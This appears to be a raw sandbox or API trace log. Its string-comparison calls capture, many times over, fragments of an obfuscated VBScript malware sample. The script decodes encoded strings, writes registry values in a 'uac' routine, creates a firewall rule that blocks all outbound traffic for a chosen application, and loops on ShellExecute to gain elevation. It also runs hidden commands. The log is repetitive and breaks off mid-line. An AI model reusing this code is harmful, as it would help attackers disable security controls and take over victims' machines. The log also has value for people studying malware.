bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 70 [0226.355] wcsncmp (_String1="et newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.355] wcsncmp (_String1="t newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0226.355] wcsncmp (_String1=" newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.355] wcsncmp (_String1="newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.356] wcsncmp (_String1="ewRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, 